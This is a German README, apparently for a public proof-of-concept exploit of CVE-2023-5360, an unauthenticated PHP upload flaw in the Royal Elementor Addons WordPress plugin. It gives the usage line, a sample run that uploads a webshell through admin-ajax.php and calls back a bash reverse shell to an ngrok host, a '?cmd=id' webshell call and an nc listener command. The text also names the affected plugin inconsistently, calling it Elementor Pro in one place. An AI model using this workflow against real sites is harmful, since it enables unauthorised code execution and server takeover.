
Royal Elementor Addons - Nicht authentifizierte Remote-Codeausführung
Das Royal Elementor Addons and Templates WordPress Plugin vor Version 1.3.79 validiert hochgeladene Dateien nicht ordnungsgemäß, was es nicht authentifizierten Benutzern ermöglichen könnte, beliebige Dateien wie PHP hochzuladen und RCE zu erreichen.
_______ ________
/ ____/ | / / ____/
/ / | | / / __/______
/ /___ | |/ /__/_____/
\____/ |___/_____/_____
|__ \ / __ \__ \|__ /
__/ // / / /_/ / /_ <
/ __// /_/ / __/___/ /
/____/\____/____/____/____
/ ____/__ // ___// __ \
/___ \ /_ </ __ \/ / / /
____/ /___/ / /_/ / /_/ /
/_____//____/\____/\____/
by X3RX3S
Dies ist ein Proof-of-Concept-Exploit für CVE-2023-5360, eine Datei-Upload-Sicherheitslücke in Elementor Pro für WordPress. Es ermöglicht einem nicht authentifizierten Angreifer, beliebige PHP-Dateien hochzuladen und Remote-Code-Ausführung zu erlangen.
python3 CVE-2023-5360.py <https://victim.site/>
Beispiel:
python3 CVE-2023-5360.py https://victim.site/
_______ ________
/ ____/ | / / ____/
/ / | | / / __/______
/ /___ | |/ /__/_____/
\____/ |___/_____/_____
|__ \ / __ \__ \|__ /
__/ // / / /_/ / /_ <
/ __// /_/ / __/___/ /
/____/\____/____/____/____
/ ____/__ // ___// __ \
/___ \ /_ </ __ \/ / / /
____/ /___/ / /_/ / /_/ /
/_____//____/\____/\____/
github.com/X3RX3SSec
by X3RX3S aka @mindfuckerrrr
[+] Target: https://victim.site
[+] Elementor page: https://victim.site)
[*] Step 1: Grabbing Elementor nonce...
[+] HTTP 200 received from target
[+] Nonce extracted: fdcb5015cd
[*] Step 2: Configure payload
[1] Simple command webshell
[2] Reverse shell (bash)
[?] Choose payload [1/2]: 2
[?] LHOST (your IP): 7.tcp.eu.ngrok.io
[?] LPORT (your PORT): 31337
[+] Reverse shell payload generated for 7.tcp.eu.ngrok.io:31337
[?] Start built-in listener? [Y/n]: Y
[+] Starting local listener on 7.tcp.eu.ngrok.io:31337...
[*] Attempt 1 of 3: Uploading payload via AJAX exploit...
[>] POST https://victim.site/wp-admin/admin-ajax.php
listening on [any] 31337 ...
[+] HTTP 200 from upload handler
[+] Shell uploaded: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] Triggering reverse shell. Have your listener ready!
[+] Trigger sent (timeout is normal for reverse shell).
[+] Arrr! Cannons fired. Check your listener! 🏴☠️💣
Payload-Optionen:
?cmd=id wie in: https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)requests-ModulAbhängigkeiten installieren:
pip install requests
nc -lvnp 1337
Dieser Exploit dient nur zu Bildungszwecken und autorisierten Sicherheitstests. Du bist für die Nutzung verantwortlich. Teste nur auf Systemen, die dir gehören oder für die du die Erlaubnis hast.
Autor: X3RX3S CVE-2023-5360